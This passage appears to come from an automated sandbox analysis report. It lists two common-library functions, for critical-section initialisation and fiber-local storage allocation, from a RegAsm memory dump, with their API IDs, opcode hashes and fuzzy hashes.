                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0045157C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 26COMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • InitializeCriticalSectionAndSpinCount.KERNEL32(00000FA0,-00000020,00459B24,-00000020,00000FA0,00000000,00000000,004034B3,?), ref: 004515BC
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000016.00000002.1121803053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_22_2_400000_RegAsm.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: CountCriticalInitializeSectionSpin
                                                                      • String ID: InitializeCriticalSectionEx$uC
                                                                      • API String ID: 2593887523-4239742784
                                                                      • Opcode ID: 1a0cfa4c19f4066a649ce2d37b8a513799a4b605e007b061648eba656b25be93
                                                                      • Instruction ID: 9812c448bfd1abe72b26bc1a8e2d9ae63d225ef19fe19f731240b3a88c04f9fd
                                                                      • Opcode Fuzzy Hash: 1a0cfa4c19f4066a649ce2d37b8a513799a4b605e007b061648eba656b25be93
                                                                      • Instruction Fuzzy Hash: B9E06D32A80258BBCB122F91CC05E8A3F12DB44BA6F004022FD0A15161A7B68D69D68A
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0045147D Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 22memoryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000016.00000002.1121803053.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_22_2_400000_RegAsm.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Alloc
                                                                      • String ID: FlsAlloc$uC
                                                                      • API String ID: 2773662609-690831660
                                                                      • Opcode ID: 2520e34fe1b2cac30b156b3166368a14b175d91dced426a0e54b0769865cd62d
                                                                      • Instruction ID: c70f7c95202b3d912519789e4f743400e7b397297c672b846b90dd47f9423eb0
                                                                      • Opcode Fuzzy Hash: 2520e34fe1b2cac30b156b3166368a14b175d91dced426a0e54b0769865cd62d
                                                                      • Instruction Fuzzy Hash: 23E0C232F88228738B1437E19C06FAF7D05CB49F66B100123FE15112A2AAEC4805C6DF
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%